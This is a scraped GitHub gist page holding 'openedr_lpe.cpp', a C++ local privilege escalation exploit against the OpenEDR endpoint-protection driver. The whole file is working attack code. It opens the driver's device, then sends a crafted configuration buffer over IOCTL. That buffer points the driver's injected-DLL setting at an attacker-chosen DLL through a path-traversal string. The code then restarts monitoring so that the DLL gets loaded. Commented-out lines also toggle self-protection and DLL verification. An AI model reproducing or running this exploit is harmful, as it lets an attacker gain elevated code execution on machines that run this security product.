Skip to content

Instantly share code, notes, and snippets.

@ikerl

ikerl/openedr_lpe.cpp Secret

Created December 12, 2025 13:27
Show Gist options

  • Select an option

    Learn more about clone URLs
  • Save ikerl/c3ec81f12ded44c2e0ae2dfdacb562ba to your computer and use it in GitHub Desktop.

Select an option

Learn more about clone URLs
Save ikerl/c3ec81f12ded44c2e0ae2dfdacb562ba to your computer and use it in GitHub Desktop.
Download ZIP
Raw
openedr_lpe.cpp
#include <windows.h>
#include <stdio.h>
#include <stdint.h>
#include "globals.h"
BOOL SendIoctl(HANDLE hDevice, DWORD ioctlCode, void* inputBuffer, DWORD inputSize);
struct LbvsHeader
{
uint32_t nMagic; // 'SVBL' = 0x4C425653
uint8_t nVersion; // usualmente 1
uint32_t nSize; // tamaño total del buffer (header + items + datos)
uint8_t nCount; // cantidad de items
};
struct FieldHeader
{
uint16_t eId; // FieldId (ej. 6 = LogFile)
uint8_t eType; // FieldType (ej. 2 = WString)
};
unsigned char buffer[] = {
// Header (LbvsHeader)
0x4c, 0x42, 0x56, 0x53, // nMagic = 'SVBL'
0x01, // nVersion = 1
100, 0x00, 0x00, 0x00, // nSize
0x02, //nCount
5,0,5,3,0,0,0, // loglevel
//0,0,4,0, // Disable self protection
//15,0,4,0, // DLL verify
14,0,2, // InjectedDll and int
0x63,0x00, // 'c'
0x3A,0x00, // ':'
0x5C,0x00, // '\'
0x77,0x00, // 'w'
0x69,0x00, // 'i'
0x6E,0x00, // 'n'
0x64,0x00, // 'd'
0x6F,0x00, // 'o'
0x77,0x00, // 'w'
0x73,0x00, // 's'
0x5C,0x00, // '\'
0x73,0x00, // 's'
0x79,0x00, // 'y'
0x73,0x00, // 's'
0x74,0x00, // 't'
0x65,0x00, // 'e'
0x6D,0x00, // 'm'
0x33,0x00, // '3'
0x32,0x00, // '2'
0x5C,0x00, // '\'
0x2E,0x00, // '.'
0x2E,0x00, // '.'
0x2f,0x00, // '/'
0x2E,0x00, // '.'
0x2E,0x00, // '.'
0x2f,0x00, // '/'
0x73,0x00, // 's'
0x74,0x00, // 't'
0x2f,0x00, // '/'
0x74,0x00, // 't'
0x2E,0x00, // '.'
0x64,0x00, // 'd'
0x6C,0x00, // 'l'
0x6C,0x00, // 'l'
0x00,0x00, 0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00, // null terminator
};
int main()
{
HANDLE hDevice = CreateFileW(
CMD_ERDDRV_IOCTLDEVICE_WIN32_NAME, GENERIC_READ | GENERIC_WRITE, 0, nullptr, CREATE_ALWAYS, FILE_ATTRIBUTE_NORMAL, nullptr);
if (hDevice == INVALID_HANDLE_VALUE) {
printf("[-] Error while opening device: %lu\n", GetLastError());
return 1;
}
printf("[+] Device opened.\n");
if (!SendIoctl(hDevice, CMD_ERDDRV_IOCTL_START, NULL, 0)) {
printf("[-] Error CMD_ERDDRV_IOCTL_START.\n");
}
// Envía IOCTL para detener monitoreo
if (!SendIoctl(hDevice, CMD_ERDDRV_IOCTL_SET_CONFIG, buffer, sizeof(buffer))) {
printf("[-] Error CMD_ERDDRV_IOCTL_SET_CONFIG.\n");
}
if (!SendIoctl(hDevice, CMD_ERDDRV_IOCTL_STOP, NULL, 0)) {
printf("[-] Error CMD_ERDDRV_IOCTL_STOP.\n");
}
// Envía IOCTL para iniciar monitoreo
if (!SendIoctl(hDevice, CMD_ERDDRV_IOCTL_START, NULL, 0)) {
printf("[-] Error CMD_ERDDRV_IOCTL_START.\n");
}
CloseHandle(hDevice);
printf("[+] Deviced closed.\n");
return 0;
}
BOOL SendIoctl(HANDLE hDevice, DWORD ioctlCode, void* inputBuffer, DWORD inputSize)
{
BYTE outBuffer[1024] = { 0 }; // Puedes ajustar el tamaño según tu necesidad
DWORD bytesReturned = 0;
BOOL success = DeviceIoControl(
hDevice,
ioctlCode,
inputBuffer,
inputSize,
outBuffer,
sizeof(outBuffer),
&bytesReturned,
NULL
);
if (!success) {
printf("[-] Error DeviceIoControl 0x%X: %lu\n", ioctlCode, GetLastError());
return FALSE;
}
printf("[+] IOCTL 0x%X executed successfully, %lu bytes returned.\n", ioctlCode, bytesReturned);
return TRUE;
}
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment